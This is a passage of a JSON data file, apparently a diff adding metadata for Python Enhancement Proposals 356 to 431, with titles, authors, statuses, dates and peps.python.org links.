Rossum, Anthony Baxter", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "07-Feb-2006", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0356/" + }, + "357": { + "number": 357, + "title": "Allowing Any Object to be Used for Slicing", + "authors": "Travis Oliphant", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Feb-2006", + "python_version": "2.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0357/" + }, + "358": { + "number": 358, + "title": "The \"bytes\" Object", + "authors": "Neil Schemenauer, Guido van 
Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Feb-2006", + "python_version": "2.6, 3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0358/" + }, + "359": { + "number": 359, + "title": "The \"make\" Statement", + "authors": "Steven Bethard", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "05-Apr-2006", + "python_version": "2.6", + "post_history": "05-Apr-2006, 06-Apr-2006, 13-Apr-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0359/" + }, + "360": { + "number": 360, + "title": "Externally Maintained Packages", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "30-May-2006", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0360/" + }, + "361": { + "number": 361, + "title": "Python 2.6 and 3.0 Release Schedule", + "authors": "Neal Norwitz, Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "29-Jun-2006", + "python_version": "2.6, 3.0", + "post_history": "17-Mar-2008", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0361/" + }, + "362": { + "number": 362, + "title": "Function Signature Object", + "authors": "Brett Cannon, Jiwon Seo, Yury Selivanov, Larry Hastings", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "21-Aug-2006", + "python_version": "3.3", + "post_history": "04-Jun-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-June/120682.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0362/" + }, + "363": { + "number": 363, + "title": "Syntax For Dynamic Attribute Access", + "authors": "Ben North", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Jan-2007", + "python_version": null, + "post_history": "12-Feb-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0363/" + }, + "364": { + "number": 364, + "title": "Transitioning to the Py3K Standard Library", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "01-Mar-2007", + "python_version": "2.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0364/" + }, + "365": { + "number": 365, + "title": "Adding the pkg_resources module", + "authors": "Phillip J. 
Eby", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "30-Apr-2007", + "python_version": null, + "post_history": "30-Apr-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0365/" + }, + "366": { + "number": 366, + "title": "Main module explicit relative imports", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-May-2007", + "python_version": "2.6, 3.0", + "post_history": "01-May-2007, 04-Jul-2007, 07-Jul-2007, 23-Nov-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0366/" + }, + "367": { + "number": 367, + "title": "New Super", + "authors": "Calvin Spealman, Tim Delaney", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "28-Apr-2007", + "python_version": "2.6", + "post_history": "`28-Apr-2007 `__, `29-Apr-2007 `__, `29-Apr-2007 `__, `14-May-2007 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0367/" + }, + "368": { + "number": 368, + "title": "Standard image protocol and class", + "authors": "Lino Mastrodomenico", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "28-Jun-2007", + "python_version": "2.6, 3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0368/" + }, + "369": { + "number": 369, + "title": "Post import hooks", + "authors": "Christian Heimes", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "02-Jan-2008", + "python_version": "2.6, 3.0", + "post_history": "02-Dec-2012", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0369/" + }, + "370": { + "number": 370, + "title": "Per user site-packages directory", + "authors": "Christian Heimes", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Jan-2008", + "python_version": "2.6, 3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0370/" + }, + "371": { + "number": 371, + "title": "Addition of the multiprocessing package to the standard library", + "authors": "Jesse Noller, Richard Oudkerk", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "06-May-2008", + "python_version": "2.6, 3.0", + "post_history": "`03-Jun-2008 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0371/" + }, + "372": { + "number": 372, + "title": "Adding an ordered dictionary to collections", + "authors": "Armin Ronacher, Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Jun-2008", + "python_version": "2.7, 3.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0372/" + }, + "373": { + "number": 373, + "title": "Python 2.7 Release Schedule", + "authors": 
"Benjamin Peterson", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "03-Nov-2008", + "python_version": "2.7", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0373/" + }, + "374": { + "number": 374, + "title": "Choosing a distributed VCS for the Python project", + "authors": "Brett Cannon, Stephen J. Turnbull, Alexandre Vassalotti, Barry Warsaw, Dirkjan Ochtman", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "07-Nov-2008", + "python_version": null, + "post_history": "07-Nov-2008, 22-Jan-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0374/" + }, + "375": { + "number": 375, + "title": "Python 3.1 Release Schedule", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "08-Feb-2009", + "python_version": "3.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0375/" + }, + "376": { + "number": 376, + "title": "Database of Installed Python Distributions", + "authors": "Tarek Ziad\u00e9", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "22-Feb-2009", + "python_version": "2.7, 3.2", + "post_history": "`22-Jun-2009 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0376/" + }, + "377": { + "number": 377, + "title": "Allow __enter__() methods to skip the statement body", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "08-Mar-2009", + "python_version": "2.7, 3.1", + "post_history": "08-Mar-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0377/" + }, + "378": { + "number": 378, + "title": "Format Specifier for Thousands Separator", + "authors": "Raymond Hettinger", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Mar-2009", + "python_version": "2.7, 3.1", + "post_history": "12-Mar-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0378/" + }, + "379": { + "number": 379, + "title": "Adding an Assignment Expression", + "authors": "Jervis Whitley", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "14-Mar-2009", + "python_version": "2.7, 3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0379/" + }, + "380": { + "number": 380, + "title": "Syntax for Delegating to a Subgenerator", + "authors": "Gregory Ewing", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Feb-2009", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2011-June/112010.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0380/" + }, + "381": { + "number": 381, + "title": 
"Mirroring infrastructure for PyPI", + "authors": "Tarek Ziad\u00e9, Martin von L\u00f6wis", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "packaging", + "created": "21-Mar-2009", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0381/" + }, + "382": { + "number": 382, + "title": "Namespace Packages", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "02-Apr-2009", + "python_version": "3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0382/" + }, + "383": { + "number": 383, + "title": "Non-decodable Bytes in System Character Interfaces", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Apr-2009", + "python_version": "3.1", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0383/" + }, + "384": { + "number": 384, + "title": "Defining a Stable ABI", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "17-May-2009", + "python_version": "3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0384/" + }, + "385": { + "number": 385, + "title": "Migrating from Subversion to Mercurial", + "authors": "Dirkjan Ochtman, Antoine Pitrou, Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "25-May-2009", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0385/" + }, + "386": { + "number": 386, + "title": "Changing the version comparison module in Distutils", + "authors": "Tarek Ziad\u00e9", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "packaging", + "created": "04-Jun-2009", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "440", + "url": "https://peps.python.org/pep-0386/" + }, + "387": { + "number": 387, + "title": "Backwards Compatibility Policy", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "", + "created": "18-Jun-2009", + "python_version": null, + "post_history": "`19-Jun-2009 `__, `12-Jun-2020 `__, `19-Dec-2022 `__, `16-Jun-2023 `__", + "resolution": null, + "requires": null, + "replaces": "291", + "superseded_by": null, + "url": "https://peps.python.org/pep-0387/" + }, + "389": { + "number": 389, + "title": "argparse - New Command Line Parsing Module", + "authors": "Steven Bethard", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "25-Sep-2009", + "python_version": "2.7, 3.2", + "post_history": "27-Sep-2009, 24-Oct-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0389/" + }, + "390": { + "number": 390, + "title": "Static metadata for Distutils", 
+ "authors": "Tarek Ziad\u00e9", + "discussions_to": "distutils-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "10-Oct-2009", + "python_version": "2.7, 3.2", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/distutils-sig/2013-April/020597.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0390/" + }, + "391": { + "number": 391, + "title": "Dictionary-Based Configuration For Logging", + "authors": "Vinay Sajip", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Oct-2009", + "python_version": "2.7, 3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0391/" + }, + "392": { + "number": 392, + "title": "Python 3.2 Release Schedule", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "30-Dec-2009", + "python_version": "3.2", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0392/" + }, + "393": { + "number": 393, + "title": "Flexible String Representation", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "24-Jan-2010", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0393/" + }, + "394": { + "number": 394, + "title": "The \"python\" Command on Unix-Like Systems", + "authors": "Kerrick Staley, Alyssa Coghlan, Barry Warsaw, Petr Viktorin, Miro Hron\u010dok, Carol Willing", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "02-Mar-2011", + "python_version": null, + "post_history": "04-Mar-2011, 20-Jul-2011, 16-Feb-2012, 30-Sep-2014, 28-Apr-2018, 26-Jun-2019", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-February/116594.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0394/" + }, + "395": { + "number": 395, + "title": "Qualified Names for Modules", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "04-Mar-2011", + "python_version": "3.4", + "post_history": "05-Mar-2011, 19-Nov-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0395/" + }, + "396": { + "number": 396, + "title": "Module Version Numbers", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "packaging", + "created": "16-Mar-2011", + "python_version": null, + "post_history": "05-Apr-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0396/" + }, + "397": { + "number": 397, + "title": "Python launcher for Windows", + "authors": "Mark Hammond, Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Mar-2011", + "python_version": "3.3", + "post_history": "21-Jul-2011, 17-May-2011, 15-Mar-2011", + "resolution": 
"https://mail.python.org/pipermail/python-dev/2012-June/120505.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0397/" + }, + "398": { + "number": 398, + "title": "Python 3.3 Release Schedule", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "23-Mar-2011", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0398/" + }, + "399": { + "number": 399, + "title": "Pure Python/C Accelerator Module Compatibility Requirements", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "04-Apr-2011", + "python_version": "3.3", + "post_history": "04-Apr-2011, 12-Apr-2011, 17-Jul-2011, 15-Aug-2011, 01-Jan-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0399/" + }, + "400": { + "number": 400, + "title": "Deprecate codecs.StreamReader and codecs.StreamWriter", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "28-May-2011", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0400/" + }, + "401": { + "number": 401, + "title": "BDFL Retirement", + "authors": "Barry Warsaw, Brett Cannon", + "discussions_to": null, + "status": "Rejected", + "type": "Process", + "topic": "", + "created": "01-Apr-2009", + "python_version": null, + "post_history": "01-Apr-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0401/" + }, + "402": { + "number": 402, + "title": "Simplified Package Layout and Partitioning", + "authors": "Phillip J. 
Eby", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "12-Jul-2011", + "python_version": "3.3", + "post_history": "20-Jul-2011", + "resolution": null, + "requires": null, + "replaces": "382", + "superseded_by": null, + "url": "https://peps.python.org/pep-0402/" + }, + "403": { + "number": 403, + "title": "General purpose decorator clause (aka \"@in\" clause)", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "13-Oct-2011", + "python_version": "3.4", + "post_history": "13-Oct-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0403/" + }, + "404": { + "number": 404, + "title": "Python 2.8 Un-release Schedule", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "09-Nov-2011", + "python_version": "2.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0404/" + }, + "405": { + "number": 405, + "title": "Python Virtual Environments", + "authors": "Carl Meyer", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "13-Jun-2011", + "python_version": "3.3", + "post_history": "24-Oct-2011, 28-Oct-2011, 06-Mar-2012, 24-May-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-May/119668.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0405/" + }, + "406": { + "number": 406, + "title": "Improved Encapsulation of Import State", + "authors": "Alyssa Coghlan, Greg Slodkowicz", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "04-Jul-2011", + "python_version": "3.4", + "post_history": "31-Jul-2011, 13-Nov-2011, 04-Dec-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0406/" + }, + "407": { + "number": 407, + "title": "New release cycle and introducing long-term support versions", + "authors": "Antoine Pitrou, Georg Brandl, Barry Warsaw", + "discussions_to": null, + "status": "Deferred", + "type": "Process", + "topic": "", + "created": "12-Jan-2012", + "python_version": null, + "post_history": "17-Jan-2012", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0407/" + }, + "408": { + "number": 408, + "title": "Standard library __preview__ package", + "authors": "Alyssa Coghlan, Eli Bendersky", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "07-Jan-2012", + "python_version": "3.3", + "post_history": "27-Jan-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-January/115962.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0408/" + }, + "409": { + "number": 409, + "title": "Suppressing exception context", + "authors": "Ethan Furman", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Jan-2012", + "python_version": "3.3", + "post_history": "30-Aug-2002, 01-Feb-2012, 03-Feb-2012", + "resolution": 
"https://mail.python.org/pipermail/python-dev/2012-February/116136.html", + "requires": null, + "replaces": null, + "superseded_by": "415", + "url": "https://peps.python.org/pep-0409/" + }, + "410": { + "number": 410, + "title": "Use decimal.Decimal type for timestamps", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Feb-2012", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2012-February/116837.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0410/" + }, + "411": { + "number": 411, + "title": "Provisional packages in the Python standard library", + "authors": "Alyssa Coghlan, Eli Bendersky", + "discussions_to": null, + "status": "Superseded", + "type": "Informational", + "topic": "", + "created": "10-Feb-2012", + "python_version": "3.3", + "post_history": "10-Feb-2012, 24-Mar-2012", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0411/" + }, + "412": { + "number": 412, + "title": "Key-Sharing Dictionary", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-Feb-2012", + "python_version": "3.3", + "post_history": "08-Feb-2012", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0412/" + }, + "413": { + "number": 413, + "title": "Faster evolution of the Python Standard Library", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "24-Feb-2012", + "python_version": null, + "post_history": "24-Feb-2012, 25-Feb-2012", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0413/" + }, + "414": { + "number": 414, + "title": "Explicit Unicode Literal for Python 3.3", + "authors": "Armin Ronacher, Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Feb-2012", + "python_version": "3.3", + "post_history": "28-Feb-2012, 04-Mar-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-February/116995.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0414/" + }, + "415": { + "number": 415, + "title": "Implement context suppression with exception attributes", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Feb-2012", + "python_version": "3.3", + "post_history": "26-Feb-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-May/119467.html", + "requires": null, + "replaces": "409", + "superseded_by": null, + "url": "https://peps.python.org/pep-0415/" + }, + "416": { + "number": 416, + "title": "Add a frozendict builtin type", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Feb-2012", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0416/" + }, + "417": { + "number": 417, + "title": "Including mock in the Standard Library", + "authors": 
"Michael Foord", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Mar-2012", + "python_version": "3.3", + "post_history": "12-Mar-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-March/117507.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0417/" + }, + "418": { + "number": 418, + "title": "Add monotonic time, performance counter, and process time functions", + "authors": "Cameron Simpson, Jim J. Jewett, Stephen J. Turnbull, Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Mar-2012", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0418/" + }, + "419": { + "number": 419, + "title": "Protecting cleanup statements from interruptions", + "authors": "Paul Colomiets", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "06-Apr-2012", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0419/" + }, + "420": { + "number": 420, + "title": "Implicit Namespace Packages", + "authors": "Eric V. Smith", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Apr-2012", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2012-May/119651.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0420/" + }, + "421": { + "number": 421, + "title": "Adding sys.implementation", + "authors": "Eric Snow", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Apr-2012", + "python_version": "3.3", + "post_history": "26-Apr-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-May/119683.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0421/" + }, + "422": { + "number": 422, + "title": "Simpler customisation of class creation", + "authors": "Alyssa Coghlan, Daniel Urban", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "05-Jun-2012", + "python_version": "3.5", + "post_history": "05-Jun-2012, 10-Feb-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0422/" + }, + "423": { + "number": 423, + "title": "Naming conventions and recipes related to packaging", + "authors": "Benoit Bryon", + "discussions_to": "distutils-sig@python.org", + "status": "Deferred", + "type": "Informational", + "topic": "packaging", + "created": "24-May-2012", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0423/" + }, + "424": { + "number": 424, + "title": "A method for exposing a length hint", + "authors": "Alex Gaynor", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "14-Jul-2012", + "python_version": "3.4", + "post_history": "`15-Jul-2012 `__", + "resolution": null, + "requires": null, + "replaces": null, + 
"superseded_by": null, + "url": "https://peps.python.org/pep-0424/" + }, + "425": { + "number": 425, + "title": "Compatibility Tags for Built Distributions", + "authors": "Daniel Holth", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "27-Jul-2012", + "python_version": "3.4", + "post_history": "08-Aug-2012, 18-Oct-2012, 15-Feb-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-February/124116.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0425/" + }, + "426": { + "number": 426, + "title": "Metadata for Python Software Packages 2.0", + "authors": "Alyssa Coghlan, Daniel Holth, Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Withdrawn", + "type": "Informational", + "topic": "packaging", + "created": "30-Aug-2012", + "python_version": null, + "post_history": "14-Nov-2012, 05-Feb-2013, 07-Feb-2013, 09-Feb-2013, 27-May-2013, 20-Jun-2013, 23-Jun-2013, 14-Jul-2013, 21-Dec-2013", + "resolution": null, + "requires": "440, 508, 518", + "replaces": "345", + "superseded_by": "566", + "url": "https://peps.python.org/pep-0426/" + }, + "427": { + "number": 427, + "title": "The Wheel Binary Package Format 1.0", + "authors": "Daniel Holth", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "20-Sep-2012", + "python_version": null, + "post_history": "18-Oct-2012, 15-Feb-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-February/124103.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0427/" + }, + "428": { + "number": 428, + "title": "The pathlib module -- object-oriented filesystem paths", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jul-2012", + "python_version": "3.4", + "post_history": "`05-Oct-2012 `__", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130424.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0428/" + }, + "429": { + "number": 429, + "title": "Python 3.4 Release Schedule", + "authors": "Larry Hastings", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "17-Oct-2012", + "python_version": "3.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0429/" + }, + "430": { + "number": 430, + "title": "Migrating to Python 3 as the default online documentation", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "27-Oct-2012", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0430/" + }, + "431": { + "number": 431, + "title": "Time zone support improvements", + "authors": "Lennart Regebro", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "11-Dec-2012", + "python_version": null, + "post_history": "11-Dec-2012, 28-Dec-2012, 28-Jan-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "615", + "url": 
